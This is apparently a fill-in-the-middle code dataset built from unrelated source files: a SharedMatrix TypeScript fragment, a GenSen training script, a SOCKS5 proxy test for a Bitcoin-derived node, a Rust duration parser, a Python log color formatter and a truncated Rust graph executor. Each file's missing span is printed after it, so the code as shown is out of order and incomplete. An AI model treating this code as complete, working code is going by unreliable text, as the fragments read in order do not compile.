adjustedCol = this.cols.adjustPosition(col, refSeq, colClientId); if (adjustedCol !== undefined) { const rowHandle = this.rows.getAllocatedHandle(adjustedRow); const colHandle = this.cols.getAllocatedHandle(adjustedCol); assert(isHandleValid(rowHandle) && isHandleValid(colHandle), 0x022 /* "SharedMatrix row and/or col handles are invalid!" */); // If there is a pending (unACKed) local write to the same cell, skip the current op // since it "happened before" the pending write. if (this.pending.getCell(rowHandle, colHandle) === undefined) { const { value } = contents; this.cells.setCell(rowHandle, colHandle, value); for (const consumer of this.consumers.values()) { consumer.cellsChanged(adjustedRow, adjustedCol, 1, 1, this); } } } } } } } } protected registerCore() { this.rows.startOrUpdateCollaboration(this.runtime.clientId, 0); this.cols.startOrUpdateCollaboration(this.runtime.clientId, 0); } // Invoked by PermutationVector to notify IMatrixConsumers of row insertion/deletions. private readonly onRowDelta = (position: number, removedCount: number, insertedCount: number) => { for (const consumer of this.consumers) { consumer.rowsChanged(position, removedCount, insertedCount, this); } }; // Invoked by PermutationVector to notify IMatrixConsumers of col insertion/deletions. private readonly onColDelta = (position: number, removedCount: number, insertedCount: number) => { for (const consumer of this.consumers) { consumer.colsChanged(position, removedCount, insertedCount, this); } }; private readonly onRowHandlesRecycled = (rowHandles: Handle[]) => { for (const rowHandle of rowHandles) { this.cells.clearRows(/* rowStart: */ rowHandle, /* rowCount: */ 1); this.pending.clearRows(/* rowStart: */ rowHandle, /* rowCount: */ 1); } }; private readonly onColHandlesRecycled = (colHandles: Handle[]) => { for (const colHandle of colHandles) { this.cells.clearCols(/* colStart: */ colHandle, /* colCount: */ 1); this.pending.clearCols(/* colStart: */ colHandle, /* colCount: */ 1); } }; /** * Returns true if the latest pending write to the cell indicated by the given row/col handles * matches the given 'localSeq'. * * A return value of `true` indicates that there are no later local operations queued that will * clobber the write op at the given 'localSeq'. This includes later ops that overwrite the cell * with a different value as well as row/col removals that might recycled the given row/col handles. */ private isLatestPendingWrite(rowHandle: Handle, colHandle: Handle, localSeq: number) { // eslint-disable-next-line @typescript-eslint/no-non-null-assertion const pendingLocalSeq = this.pending.getCell(rowHandle, colHandle)!; // Note while we're awaiting the ACK for a local set, it's possible for the row/col to be // locally removed and the row/col handles recycled. If this happens, the pendingLocalSeq will // be 'undefined' or > 'localSeq'. assert(!(pendingLocalSeq < localSeq), // eslint-disable-next-line max-len 0x023 /* "The 'localSeq' of pending write (if any) must be <= the localSeq of the currently processed op." */); // If this is the most recent write to the cell by the local client, the stored localSeq // will be an exact match for the given 'localSeq'. return pendingLocalSeq === localSeq; } public toString() { let s = `client:${this.runtime.clientId}\nrows: ${this.rows.toString()}\ncols: ${this.cols.toString()}\n\n`; for (let r = 0; r < this.rowCount; r++) { s += ` [`; for (let c = 0; c < this.colCount; c++) { if (c > 0) { s += ", "; } s += `${JSON.stringify(this.getCell(r, c))}`; } s += "]\n"; } return `${s}\n`; } protected applyStashedOp() { throw new Error("not implemented"); } }
SharedMatrix
gensen_train.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """ The GenSen training process follows the steps: 1. Create or load the dataset vocabulary 2. Train on the training dataset for each batch epoch (batch size = 48 updates) 3. Evaluate on the validation dataset for every 10 epoches 4. Find the local minimum point on validation loss 5. Save the best model and stop the training process AzureML provides AI Compute to train the model and track the performance. This training process is based on GPU only. """ import argparse import json import logging import os import time import horovod.torch as hvd import mlflow import numpy as np import torch import torch.backends.cudnn as cudnn import torch.nn as nn import torch.nn.functional as f import torch.optim as optim from utils_nlp.models.gensen.multi_task_model import MultitaskModel from utils_nlp.models.gensen.utils import ( BufferedDataIterator, NLIIterator, compute_validation_loss, ) cudnn.benchmark = True logger = logging.getLogger(__name__) hvd.init() if torch.cuda.is_available(): # Horovod: pin GPU to local rank. torch.cuda.set_device(hvd.local_rank()) def metric_average(value, name): """ Sync the validation loss with nodes. :param value: :param name: :return: """ tensor = torch.tensor(value) avg_tensor = hvd.allreduce(tensor, name=name) return avg_tensor.item() def setup_horovod(model, learning_rate): """ Setup for Horovod usage. Args: model(MultitaskModel): The MultitaskModel object. learning_rate(float): Learning rate for the model. Returns: hvd.DistributedOptimizer: Optimizer to use for computing gradients and applying updates. """ # Horovod: scale learning rate by the number of GPUs. optimizer = optim.Adam(model.parameters(), lr=learning_rate * hvd.size()) # Horovod: broadcast parameters & optimizer state. hvd.broadcast_parameters(model.state_dict(), root_rank=0) hvd.broadcast_optimizer_state(optimizer, root_rank=0) # Horovod: (optional) compression algorithm. compression = hvd.Compression.fp16 # Horovod: wrap optimizer with DistributedOptimizer. optimizer = hvd.DistributedOptimizer( optimizer, named_parameters=model.named_parameters(), compression=compression, ) return optimizer def setup_logging(config): logging.basicConfig( level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s", filename="log/%s" % (config["data"]["task"]), filemode="w", ) console = logging.StreamHandler() console.setLevel(logging.INFO) formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s") console.setFormatter(formatter) logging.getLogger("").addHandler(console) def log_config(config): logging.info("Model Parameters : ") logging.info("Task : %s " % (config["data"]["task"])) logging.info( "Source Word Embedding Dim : %s" % (config["model"]["dim_word_src"]) ) logging.info( "Target Word Embedding Dim : %s" % (config["model"]["dim_word_trg"]) ) logging.info("Source RNN Hidden Dim : %s" % (config["model"]["dim_src"])) logging.info("Target RNN Hidden Dim : %s" % (config["model"]["dim_trg"])) logging.info( "Source RNN Bidirectional : %s" % (config["model"]["bidirectional"]) ) logging.info("Batch Size : %d " % (config["training"]["batch_size"])) logging.info("Optimizer : %s " % (config["training"]["optimizer"])) logging.info("Learning Rate : %f " % (config["training"]["lrate"])) def evaluate( config, train_iterator, model, loss_criterion, monitor_epoch, min_val_loss, min_val_loss_epoch, save_dir, starting_time, model_state, max_epoch, ): """ Function to validate the model. Args: max_epoch(int): Limit training to specified number of epochs. model_state(dict): Saved model weights. config(dict): Config object. train_iterator(BufferedDataIterator): BufferedDataIterator object. model(MultitaskModel): The MultitaskModel object. loss_criterion(nn.CrossEntropyLoss): Cross entropy loss. monitor_epoch(int): Current epoch count. min_val_loss(float): Minimum validation loss min_val_loss_epoch(int): Epoch where the minimum validation loss was seen. save_dir(str): Directory path to save the model dictionary. starting_time(time.Time): Starting time of the training. Returns: bool: Whether to continue training or not. """ break_flag = 0 for task_idx, task in enumerate(train_iterator.tasknames): if "skipthought" in task: continue validation_loss = compute_validation_loss( config, model, train_iterator, loss_criterion, task_idx, lowercase=True, ) validation_loss = metric_average(validation_loss, "val_loss") logging.info("%s Validation Loss : %.3f" % (task, validation_loss)) # Horovod: print output only on first rank. if hvd.rank() == 0: # log the best val accuracy to AML run logging.info( "Best Validation Loss: {}".format(np.float(validation_loss)) ) # If the validation loss is small enough, and it starts to go up. # Should stop training. # Small is defined by the number of epochs it lasts. if validation_loss < min_val_loss: min_val_loss = validation_loss min_val_loss_epoch = monitor_epoch model_state = model.state_dict() logging.info( "Monitor epoch: %d Validation Loss: %.3f Min Validation Epoch: " "%d Loss : %.3f " % ( monitor_epoch, validation_loss, min_val_loss_epoch, min_val_loss, ) ) if (monitor_epoch - min_val_loss_epoch) > config["training"][ "stop_patience" ] or (max_epoch is not None and monitor_epoch >= max_epoch): logging.info("Saving model ...") # Save the name with validation loss. torch.save( model_state, open(os.path.join(save_dir, "best_model.model"), "wb"), ) # Let the training end. break_flag = 1 break if break_flag == 1: logging.info("##### Training stopped at ##### %f" % min_val_loss) logging.info( "##### Training Time ##### %f seconds" % (time.time() - starting_time) ) return True, min_val_loss_epoch, min_val_loss, model_state else: return False, min_val_loss_epoch, min_val_loss, model_state def evaluate_nli(nli_iterator, model, batch_size, n_gpus): """ Args: nli_iterator(NLIIterator): NLIIterator object. model(MultitaskModel): Multitask model object. batch_size(int): Batch size. n_gpus(int): Number of gpus """ n_correct = 0.0 n_wrong = 0.0 for j in range(0, len(nli_iterator.dev_lines), batch_size * n_gpus): minibatch = nli_iterator.get_parallel_minibatch( j, batch_size * n_gpus, "dev" ) class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) class_preds = ( f.softmax(class_logits).data.cpu().numpy().argmax(axis=-1) ) labels = minibatch["labels"].data.cpu().numpy() for pred, label in zip(class_preds, labels): if pred == label: n_correct += 1.0 else: n_wrong += 1.0 logging.info("NLI Dev Acc : %.5f" % (n_correct / (n_correct + n_wrong))) n_correct = 0.0 n_wrong = 0.0 for j in range(0, len(nli_iterator.test_lines), batch_size * n_gpus): minibatch = nli_iterator.get_parallel_minibatch( j, batch_size * n_gpus, "test" ) class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) class_preds = ( f.softmax(class_logits).data.cpu().numpy().argmax(axis=-1) ) labels = minibatch["labels"].data.cpu().numpy() for pred, label in zip(class_preds, labels): if pred == label: n_correct += 1.0 else: n_wrong += 1.0 logging.info("NLI Test Acc : %.5f" % (n_correct / (n_correct + n_wrong))) logging.info("******************************************************") def train(config, data_folder, learning_rate=0.0001, max_epoch=None): """ Train the Gensen model. Args: max_epoch(int): Limit training to specified number of epochs. config(dict): Loaded json file as a python object. data_folder(str): Path to the folder containing the data. learning_rate(float): Learning rate for the model. """ owd = os.getcwd() os.chdir(data_folder) try: with mlflow.start_run(): save_dir = config["data"]["save_dir"] if not os.path.exists("./log"): os.makedirs("./log") os.makedirs(save_dir, exist_ok=True) setup_logging(config) batch_size = config["training"]["batch_size"] src_vocab_size = config["model"]["n_words_src"] trg_vocab_size = config["model"]["n_words_trg"] max_len_src = config["data"]["max_src_length"] max_len_trg = config["data"]["max_trg_length"] model_state = {} train_src = [item["train_src"] for item in config["data"]["paths"]] train_trg = [item["train_trg"] for item in config["data"]["paths"]] tasknames = [item["taskname"] for item in config["data"]["paths"]] # Keep track of indicies to train forward and backward jointly if ( "skipthought_next" in tasknames and "skipthought_previous" in tasknames ): skipthought_idx = tasknames.index("skipthought_next") skipthought_backward_idx = tasknames.index( "skipthought_previous" ) paired_tasks = { skipthought_idx: skipthought_backward_idx, skipthought_backward_idx: skipthought_idx, } else: paired_tasks = None skipthought_idx = None skipthought_backward_idx = None train_iterator = BufferedDataIterator( train_src, train_trg, src_vocab_size, trg_vocab_size, tasknames, save_dir, buffer_size=1e6, lowercase=True, seed=(hvd.rank() + 1) * 12345, ) nli_iterator = NLIIterator( train=config["data"]["nli_train"], dev=config["data"]["nli_dev"], test=config["data"]["nli_test"], vocab_size=-1, vocab=os.path.join(save_dir, "src_vocab.pkl"), seed=(hvd.rank() + 1) * 12345, ) src_vocab_size = len(train_iterator.src[0]["word2id"]) trg_vocab_size = len(train_iterator.trg[0]["word2id"]) # Logging set up. logging.info("Finished creating iterator ...") log_config(config) logging.info( "Found %d words in source : " % (len(train_iterator.src[0]["id2word"])) ) for idx, taskname in enumerate(tasknames): logging.info( "Found %d target words in task %s " % (len(train_iterator.trg[idx]["id2word"]), taskname) ) logging.info("Found %d words in src " % src_vocab_size) logging.info("Found %d words in trg " % trg_vocab_size) weight_mask = torch.ones(trg_vocab_size).cuda() weight_mask[train_iterator.trg[0]["word2id"]["<pad>"]] = 0 loss_criterion = nn.CrossEntropyLoss(weight=weight_mask).cuda() nli_criterion = nn.CrossEntropyLoss().cuda() model = MultitaskModel( src_emb_dim=config["model"]["dim_word_src"], trg_emb_dim=config["model"]["dim_word_trg"], src_vocab_size=src_vocab_size, trg_vocab_size=trg_vocab_size, src_hidden_dim=config["model"]["dim_src"], trg_hidden_dim=config["model"]["dim_trg"], bidirectional=config["model"]["bidirectional"], pad_token_src=train_iterator.src[0]["word2id"]["<pad>"], pad_token_trg=train_iterator.trg[0]["word2id"]["<pad>"], nlayers_src=config["model"]["n_layers_src"], dropout=config["model"]["dropout"], num_tasks=len(train_iterator.src), paired_tasks=paired_tasks, ).cuda() optimizer = setup_horovod(model, learning_rate=learning_rate) logging.info(model) n_gpus = config["training"]["n_gpus"] model = torch.nn.DataParallel(model, device_ids=range(n_gpus)) task_losses = [[] for _ in tasknames] task_idxs = [0 for _ in tasknames] nli_losses = [] updates = 0 nli_ctr = 0 nli_epoch = 0 monitor_epoch = 0 nli_mbatch_ctr = 0 mbatch_times = [] min_val_loss = 10000000 min_val_loss_epoch = -1 rng_num_tasks = ( len(tasknames) - 1 if paired_tasks else len(tasknames) ) logging.info("OS Environ: \n {} \n\n".format(os.environ)) mlflow.log_param("learning_rate", learning_rate) logging.info("Commencing Training ...") start = time.time() while True: batch_start_time = time.time() # Train NLI once every 10 minibatches of other tasks if nli_ctr % 10 == 0: minibatch = nli_iterator.get_parallel_minibatch( nli_mbatch_ctr, batch_size * n_gpus ) optimizer.zero_grad() class_logits = model( minibatch, -1, return_hidden=False, paired_trg=None ) loss = nli_criterion( class_logits.contiguous().view( -1, class_logits.size(1) ), minibatch["labels"].contiguous().view(-1), ) # nli_losses.append(loss.data[0]) nli_losses.append(loss.item()) loss.backward() torch.nn.utils.clip_grad_norm(model.parameters(), 1.0) optimizer.step() nli_mbatch_ctr += batch_size * n_gpus if nli_mbatch_ctr >= len(nli_iterator.train_lines): nli_mbatch_ctr = 0 nli_epoch += 1 else: # Sample a random task task_idx = np.random.randint(low=0, high=rng_num_tasks) # Get a minibatch corresponding to the sampled task minibatch = train_iterator.get_parallel_minibatch( task_idx, task_idxs[task_idx], batch_size * n_gpus, max_len_src, max_len_trg, ) """Increment pointer into task and if current buffer is exhausted, fetch new buffer. """ task_idxs[task_idx] += batch_size * n_gpus if task_idxs[task_idx] >= train_iterator.buffer_size: train_iterator.fetch_buffer(task_idx) task_idxs[task_idx] = 0 if task_idx == skipthought_idx: minibatch_back = train_iterator.get_parallel_minibatch( skipthought_backward_idx, task_idxs[skipthought_backward_idx], batch_size * n_gpus, max_len_src, max_len_trg, ) task_idxs[skipthought_backward_idx] += ( batch_size * n_gpus ) if ( task_idxs[skipthought_backward_idx] >= train_iterator.buffer_size ): train_iterator.fetch_buffer( skipthought_backward_idx ) task_idxs[skipthought_backward_idx] = 0 optimizer.zero_grad() decoder_logit, decoder_logit_2 = model( minibatch, task_idx, paired_trg=minibatch_back["input_trg"], ) loss_f = loss_criterion( decoder_logit.contiguous().view( -1, decoder_logit.size(2) ), minibatch["output_trg"].contiguous().view(-1), ) loss_b = loss_criterion( decoder_logit_2.contiguous().view( -1, decoder_logit_2.size(2) ), minibatch_back["output_trg"].contiguous().view(-1), ) task_losses[task_idx].append(loss_f.data[0]) task_losses[skipthought_backward_idx].append( loss_b.data[0] ) loss = loss_f + loss_b else: optimizer.zero_grad() decoder_logit = model(minibatch, task_idx) loss = loss_criterion( decoder_logit.contiguous().view( -1, decoder_logit.size(2) ), minibatch["output_trg"].contiguous().view(-1), ) task_losses[task_idx].append(loss.item()) loss.backward() # For distributed optimizer need to sync before gradient # clipping. optimizer.synchronize() torch.nn.utils.clip_grad_norm(model.parameters(), 1.0) optimizer.step() end = time.time() mbatch_times.append(end - batch_start_time) # Validations if ( updates % config["management"]["monitor_loss"] == 0 and updates != 0 ): monitor_epoch += 1 for idx, task in enumerate(tasknames): logging.info( "Seq2Seq Examples Processed : %d %s Loss : %.5f Num %s " "minibatches : %d" % ( updates, task, np.mean(task_losses[idx]),
) ) mlflow.log_metric( "validation_loss", np.mean(task_losses[idx]), step=monitor_epoch, ) logging.info( "Round: %d NLI Epoch : %d NLI Examples Processed : %d NLI " "Loss : %.5f " % ( nli_ctr, nli_epoch, nli_mbatch_ctr, np.mean(nli_losses), ) ) mlflow.log_metric( "nli_loss", np.mean(nli_losses), step=nli_epoch ) logging.info( "Average time per minibatch : %.5f" % (np.mean(mbatch_times)) ) mlflow.log_metric( "minibatch_avg_duration", np.mean(mbatch_times) ) task_losses = [[] for _ in tasknames] mbatch_times = [] nli_losses = [] # For validate and break if done. logging.info("############################") logging.info("##### Evaluating model #####") logging.info("############################") training_complete, min_val_loss_epoch, min_val_loss, model_state = evaluate( config=config, train_iterator=train_iterator, model=model, loss_criterion=loss_criterion, monitor_epoch=monitor_epoch, min_val_loss=min_val_loss, min_val_loss_epoch=min_val_loss_epoch, save_dir=save_dir, starting_time=start, model_state=model_state, max_epoch=max_epoch, ) if training_complete: mlflow.log_metric("min_val_loss", float(min_val_loss)) mlflow.log_metric("learning_rate", learning_rate) break logging.info("Evaluating on NLI") evaluate_nli( nli_iterator=nli_iterator, model=model, n_gpus=n_gpus, batch_size=batch_size, ) updates += batch_size * n_gpus nli_ctr += 1 logging.info("Updates: %d" % updates) finally: os.chdir(owd) def read_config(json_file): """Read JSON config.""" json_object = json.load(open(json_file, "r", encoding="utf-8")) return json_object if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--config", help="path to json config", required=True) parser.add_argument("--data_folder", type=str, help="data folder") # Add learning rate to tune model. parser.add_argument( "--learning_rate", type=float, default=0.0001, help="learning rate" ) parser.add_argument( "--max_epoch", type=int, default=None, help="Limit training to specified number of epochs.", ) args = parser.parse_args() data_path = args.data_folder lr = args.learning_rate config_file_path = args.config max_epoch = args.max_epoch config_obj = read_config(config_file_path) train(config_obj, data_path, lr, max_epoch)
task, len(task_losses[idx]),
mod.rs
pub mod cookie;
feature_proxy.py
#!/usr/bin/env python3 # Copyright (c) 2015-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test bitcoind with different proxy configuration. Test plan: - Start nesteggd's with different proxy configurations - Use addnode to initiate connections - Verify that proxies are connected to, and the right connection command is given - Proxy configurations to test on nesteggd side: - `-proxy` (proxy everything) - `-onion` (proxy just onions) - `-proxyrandomize` Circuit randomization - Proxy configurations to test on proxy side, - support no authentication (other proxy) - support no authentication + user/pass authentication (Tor) - proxy on IPv6 - Create various proxies (as threads) - Create nesteggds that connect to them - Manipulate the nesteggds using addnode (onetry) an observe effects addnode connect to IPv4 addnode connect to IPv6 addnode connect to onion addnode connect to generic DNS name """ import socket import os from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType from test_framework.test_framework import PivxTestFramework from test_framework.util import ( PORT_MIN, PORT_RANGE, assert_equal, ) from test_framework.netutil import test_ipv6_local RANGE_BEGIN = PORT_MIN + 2 * PORT_RANGE # Start after p2p and rpc ports class ProxyTest(PivxTestFramework): def set_test_params(self): self.num_nodes = 4 def setup_nodes(self): self.have_ipv6 = test_ipv6_local() # Create two proxies on different ports # ... one unauthenticated self.conf1 = Socks5Configuration() self.conf1.addr = ('127.0.0.1', RANGE_BEGIN + (os.getpid() % 1000)) self.conf1.unauth = True self.conf1.auth = False # ... one supporting authenticated and unauthenticated (Tor) self.conf2 = Socks5Configuration() self.conf2.addr = ('127.0.0.1', RANGE_BEGIN + 1000 + (os.getpid() % 1000)) self.conf2.unauth = True self.conf2.auth = True if self.have_ipv6: # ... one on IPv6 with similar configuration self.conf3 = Socks5Configuration() self.conf3.af = socket.AF_INET6 self.conf3.addr = ('::1', RANGE_BEGIN + 2000 + (os.getpid() % 1000)) self.conf3.unauth = True self.conf3.auth = True else: self.log.warning("Testing without local IPv6 support") self.serv1 = Socks5Server(self.conf1) self.serv1.start() self.serv2 = Socks5Server(self.conf2) self.serv2.start() if self.have_ipv6: self.serv3 = Socks5Server(self.conf3) self.serv3.start() # Note: proxies are not used to connect to local nodes # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost args = [ ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'], ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'], ['-listen', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'], [] ] if self.have_ipv6: args[3] = ['-listen', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion'] self.add_nodes(self.num_nodes, extra_args=args) self.start_nodes() def node_test(self, node, proxies, auth, test_onion=True): rv = [] # Test: outgoing IPv4 connection through node node.addnode("15.61.23.23:1234", "onetry") cmd = proxies[0].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"15.61.23.23") assert_equal(cmd.port, 1234) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if self.have_ipv6: # Test: outgoing IPv6 connection through node node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry") cmd = proxies[1].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"1233:3432:2434:2343:3234:2345:6546:4534") assert_equal(cmd.port, 5443) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if test_onion: # Test: outgoing onion connection through node node.addnode("bitcoinostk4e4re.onion:8333", "onetry") cmd = proxies[2].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"bitcoinostk4e4re.onion") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing DNS name connection through node node.addnode("node.noumenon:8333", "onetry") cmd = proxies[3].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"node.noumenon") assert_equal(cmd.port, 8333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) return rv def run_test(self): # basic -proxy self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False) # -proxy plus -onion self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False) # -proxy plus -onion, -proxyrandomize rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True) # Check that credentials as used for -proxyrandomize connections are unique credentials = set((x.username,x.password) for x in rv) assert_equal(len(credentials), len(rv)) if self.have_ipv6: # proxy on IPv6 localhost self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False) def networks_dict(d):
# test RPC getnetworkinfo n0 = networks_dict(self.nodes[0].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n0[net]['proxy_randomize_credentials'], True) assert_equal(n0['onion']['reachable'], True) n1 = networks_dict(self.nodes[1].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n1[net]['proxy_randomize_credentials'], False) assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n1['onion']['proxy_randomize_credentials'], False) assert_equal(n1['onion']['reachable'], True) n2 = networks_dict(self.nodes[2].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n2[net]['proxy_randomize_credentials'], True) assert_equal(n2['onion']['reachable'], True) if self.have_ipv6: n3 = networks_dict(self.nodes[3].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr)) assert_equal(n3[net]['proxy_randomize_credentials'], False) assert_equal(n3['onion']['reachable'], False) if __name__ == '__main__': ProxyTest().main()
r = {} for x in d['networks']: r[x['name']] = x return r
duration.rs
use *; pub fn parse_duration(s: &str) -> Result<std::time::Duration, <u64 as FromStr>::Err> { Ok(std::time::Duration::from_millis(s.parse()?)) } pub enum
{ Some(std::time::Duration), Infinite, } impl FromStr for Duration { type Err = <u64 as FromStr>::Err; fn from_str(s: &str) -> Result<Self, Self::Err> { if s == "infinite" || s == "inf" { Ok(Duration::Infinite) } else { Ok(Duration::Some(parse_duration(s)?)) } } } pub fn to_millis(duration: std::time::Duration) -> u64 { duration.as_secs() * 1000 + duration.subsec_millis() as u64 }
Duration
color_format.py
""" Created by Epic at 10/13/20 Original script by FireDiscordBot on GitHub """ import logging from copy import copy from logging import Logger, DEBUG import sys BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) RESET_SEQ = "\033[0m" COLOR_SEQ = "\033[1;%dm" BOLD_SEQ = "\033[1m" def getcolor(color=None): return COLOR_SEQ % (30 + (color or WHITE)) def formatter_message(message): for k, v in COLORS.items(): message = message.replace(k, v) return message
"INFO": GREEN, "DEBUG": BLUE, "CRITICAL": YELLOW, "ERROR": RED } COLORS = { "$GREEN": getcolor(GREEN), "$BLUE": getcolor(BLUE), "$RED": getcolor(RED), "$YELLOW": getcolor(YELLOW), "$BLACK": getcolor(BLACK), "$MAGENTA": getcolor(MAGENTA), "$CYAN": getcolor(CYAN), "$WHITE": getcolor(WHITE), "$RESET": RESET_SEQ, "$BOLD": BOLD_SEQ } class ColoredFormatter(logging.Formatter): def __init__(self, msg): super().__init__(msg) def format(self, record): record = copy(record) levelname = record.levelname if levelname in LEVELS: levelname_color = COLOR_SEQ % (30 + LEVELS[levelname]) + levelname + RESET_SEQ record.levelname = levelname_color for k, v in COLORS.items(): record.msg = str(record.msg).replace(k, v) return super().format(record) def basicConfig(logger: Logger): stdout = logging.StreamHandler(sys.stdout) stdout.setLevel(DEBUG) color_format = formatter_message( "[$BOLD%(name)s$RESET][%(levelname)s] %(message)s $RESET($BOLD%(filename)s$RESET:%(lineno)d)") stdout.setFormatter(ColoredFormatter(color_format)) logger.addHandler(stdout)
LEVELS = { "WARNING": YELLOW,
executor.rs
// //! Copyright 2020 Alibaba Group Holding Limited. //! //! Licensed under the Apache License, Version 2.0 (the "License"); //! you may not use this file except in compliance with the License. //! You may obtain a copy of the License at //! //! http://www.apache.org/licenses/LICENSE-2.0 //! //! Unless required by applicable law or agreed to in writing, software //! distributed under the License is distributed on an "AS IS" BASIS, //! WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. //! See the License for the specific language governing permissions and //! limitations under the License. #![allow(bare_trait_objects)] extern crate futures; extern crate grpcio; #[macro_use] extern crate log; extern crate log4rs; extern crate maxgraph_common; extern crate maxgraph_runtime; extern crate maxgraph_store; extern crate maxgraph_server; extern crate protobuf; extern crate structopt; extern crate pegasus; use std::sync::mpsc::{channel, Sender}; use std::sync::{Arc, Mutex, RwLock}; use std::thread; use std::time::Duration; use std::env; use maxgraph_common::proto::query_flow::*; use maxgraph_common::proto::hb::*; use maxgraph_runtime::server::manager::*; use maxgraph_runtime::server::query_manager::*; use maxgraph_common::util::log4rs::init_log4rs; use maxgraph_store::config::{StoreConfig}; use maxgraph_store::api::prelude::*; use protobuf::Message; use maxgraph_common::util; use maxgraph_runtime::{server::RuntimeInfo}; use grpcio::{ServerBuilder, EnvBuilder}; use grpcio::ChannelBuilder; use grpcio::Environment; use grpcio::Server; use maxgraph_runtime::rpc::*; use maxgraph_common::proto::data::*; use rpc_pegasus::ctrl_service::MaxGraphCtrlServiceImpl as PegasusCtrlService; use rpc_pegasus::async_maxgraph_service::AsyncMaxGraphServiceImpl as PegasusAsyncService; use rpc_pegasus::maxgraph_service::MaxGraphServiceImpl as PegasusService; use std::sync::atomic::AtomicBool; use maxgraph_runtime::utils::get_lambda_service_client; use maxgraph_runtime::store::remote_store_service::RemoteStoreServiceManager; use maxgraph_store::api::graph_partition::{GraphPartitionManager}; use maxgraph_runtime::store::ffi::{GlobalVertex, GlobalVertexIter, FFIEdge, GlobalEdgeIter}; use maxgraph_server::StoreContext; fn main() { if let Some(_) = env::args().find(|arg| arg == "--show-build-info") { util::get_build_info(); return; } init_log4rs(); let mut store_config = { let args: Vec<String> = std::env::args().collect(); if args.len() <= 5 && args[1] == "--config" { StoreConfig::init_from_file(&args[2], &args[4]) } else { StoreConfig::init() } }; let (alive_id, partitions) = get_init_info(&store_config); info!("partitions: {:?}", partitions); store_config.update_alive_id(alive_id); info!("{:?}", store_config); let worker_num = store_config.timely_worker_per_process; let store_config = Arc::new(store_config); if cfg!(target_os = "linux") { info!("Start executor with vineyard graph object id {:?}", store_config.vineyard_graph_id); use maxgraph_runtime::store::ffi::FFIGraphStore; let ffi_store = FFIGraphStore::new(store_config.vineyard_graph_id, worker_num as i32); let partition_manager = ffi_store.get_partition_manager(); run_main(store_config, Arc::new(ffi_store), Arc::new(partition_manager)); } else { unimplemented!("Mac not support vineyard graph") } } fn run_main(store_config: Arc<StoreConfig>, vineyard_graph: Arc<GlobalGraphQuery<V=GlobalVertex, E=FFIEdge, VI=GlobalVertexIter, EI=GlobalEdgeIter>>, partition_manager: Arc<GraphPartitionManager>) { let process_partition_list = partition_manager.get_process_partition_list(); let runtime_info = Arc::new(Mutex::new(RuntimeInfo::new(store_config.timely_worker_per_process, process_partition_list))); let runtime_info_clone = runtime_info.clone(); let (hb_resp_sender, hb_resp_receiver) = channel(); let query_manager = QueryManager::new(); let server_manager: Box<dyn ServerManager<Data=Vec<u8>>>; let ctrl_service; let async_maxgraph_service; let maxgraph_service; info!("Start pegasus ........"); let remote_store_service_manager = Arc::new(RwLock::new(Some(RemoteStoreServiceManager::empty()))); info!("is lambda enabled: {}", store_config.lambda_enabled); let lambda_service_client = if store_config.lambda_enabled { get_lambda_service_client() } else { None }; let signal = Arc::new(AtomicBool::new(false)); let pegasus_server_manager = PegasusServerManager::new(hb_resp_receiver, runtime_info, remote_store_service_manager.clone(), signal.clone()); let pegasus_runtime = pegasus_server_manager.get_server(); let task_partition_manager = pegasus_server_manager.get_task_partition_manager(); ctrl_service = PegasusCtrlService::new_service(query_manager.clone(), 